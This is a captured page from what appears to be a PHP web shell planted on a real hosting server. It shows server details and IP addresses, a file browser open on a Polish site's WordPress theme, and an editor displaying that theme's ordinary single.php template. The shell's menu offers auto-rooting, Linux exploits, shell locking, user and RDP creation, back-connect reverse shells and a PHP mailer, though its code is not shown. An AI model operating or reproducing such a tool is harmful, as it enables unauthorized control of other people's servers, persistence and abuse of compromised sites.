FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 3.147.68.25
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
admin
[ DIR ]
drwxr-xr-x
?;
bbpress
[ DIR ]
drwxr-xr-x
?;
css
[ DIR ]
drwxr-xr-x
?;
images
[ DIR ]
drwxr-xr-x
?;
inc
[ DIR ]
drwxr-xr-x
?;
js
[ DIR ]
drwxr-xr-x
?;
languages
[ DIR ]
drwxr-xr-x
?;
page-templates
[ DIR ]
drwxr-xr-x
?;
templates
[ DIR ]
drwxr-xr-x
?;
tribe-events
[ DIR ]
drwxr-xr-x
?;
woocommerce
[ DIR ]
drwxr-xr-x
404.php
1.97
KB
-rw-r--r--
attachment.php
4.32
KB
-rw-r--r--
comments.php
2.13
KB
-rw-r--r--
editor-style.css
5.67
KB
-rw-r--r--
footer.php
5.48
KB
-rw-r--r--
functions.php
25.03
KB
-rw-r--r--
header.php
2.04
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
page.php
1.41
KB
-rw-r--r--
rtl.css
5.6
KB
-rw-r--r--
screenshot.png
702.5
KB
-rw-r--r--
sidebar.php
501
B
-rw-r--r--
single.php
4.99
KB
-rw-r--r--
style.css
164.46
KB
-rw-r--r--
wpml-config.xml
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php $layout = leaf_get_option('post_sidebar_layout','right'); get_header(); ?> <?php get_template_part( 'templates/header/header', 'heading' ); ?> <div id="body"> <div class="container"> <div class="content-pad-4x"> <div class="row"> <div id="content" class="<?php if($layout!='full'){ ?> col-md-9 <?php }else{ ?> col-md-12 <?php } if($layout == 'left'){ ?> revert-layout <?php }?>" role="main"> <article class="single-post-content single-content"> <?php // The Loop while ( have_posts() ) : the_post(); get_template_part('templates/single/content','featured-image'); get_template_part('templates/single/content','single'); endwhile; ?> </article> <?php if(ot_get_option('enable_author')!='off' && get_the_author_meta('description')){ ?> <div class="about-author"> <div class="author-avatar"> <?php if(isset($__check_retina)&&$__check_retina){ echo get_avatar( get_the_author_meta('email'), 100); }else{ echo get_avatar( get_the_author_meta('email'), 100); }?> </div> <div class="author-info"> <h4 class="font-2"><?php the_author_posts_link(); ?></h4> <?php the_author_meta('description'); ?> </div> <div class="clearfix"></div> </div><!--/about-author--> <?php }?> <?php if(ot_get_option('single_navi')!='off'){ ?> <div class="sc-single-event-nav single-post-navigation-new"> <div class="row"> <?php if($p = get_adjacent_post(true, '', true)){ ?> <div class="col-sm-6"> <a class="post-nav-item dark-div" href="<?php echo get_permalink($p->ID); ?>"> <?php if(has_post_thumbnail($p->ID)){ $thumbnail = wp_get_attachment_image_src(get_post_thumbnail_id($p->ID),'sportcenter_thumb_500x500', true); }else{ $thumbnail = leaf_print_default_thumbnail(); }?> <img src="<?php echo esc_url($thumbnail[0]) ?>"> <div class="post-nav-item-content"> <div class="small"><i class="fa fa-angle-left"></i> <?php esc_html_e('Previous','sportcenter'); ?></div> <h4 class="font-2"><?php echo get_the_title($p->ID); ?></h4> </div> </a> </div> <?php }else{//if prev //sc_print_nav_blog('prev'); } if($n = get_adjacent_post(true, '', false)){ ?> <div class="col-sm-6 col-nav-next"> <a class="post-nav-item dark-div" href="<?php echo get_permalink($n->ID); ?>"> <?php if(has_post_thumbnail($n->ID)){ $thumbnail = wp_get_attachment_image_src(get_post_thumbnail_id($n->ID),'sportcenter_thumb_500x500', true); }else{ $thumbnail = leaf_print_default_thumbnail(); }?> <img src="<?php echo esc_url($thumbnail[0]) ?>"> <div class="post-nav-item-content"> <div class="small"><?php esc_html_e('Next','sportcenter'); ?> <i class="fa fa-angle-right"></i></div> <h4 class="font-2"><?php echo get_the_title($n->ID); ?></h4> </div> </a> </div> <?php }else{//if next //sc_print_nav_blog('next'); }?> </div> </div><!--/single-nav--> <?php }?> <?php comments_template( '', true ); ?> </div><!--/content--> <?php if($layout != 'full'){get_sidebar();} ?> </div><!--/row--> </div><!--/content-pad-4x--> </div><!--/container--> </div><!--/body--> <?php get_footer(); ?>
Close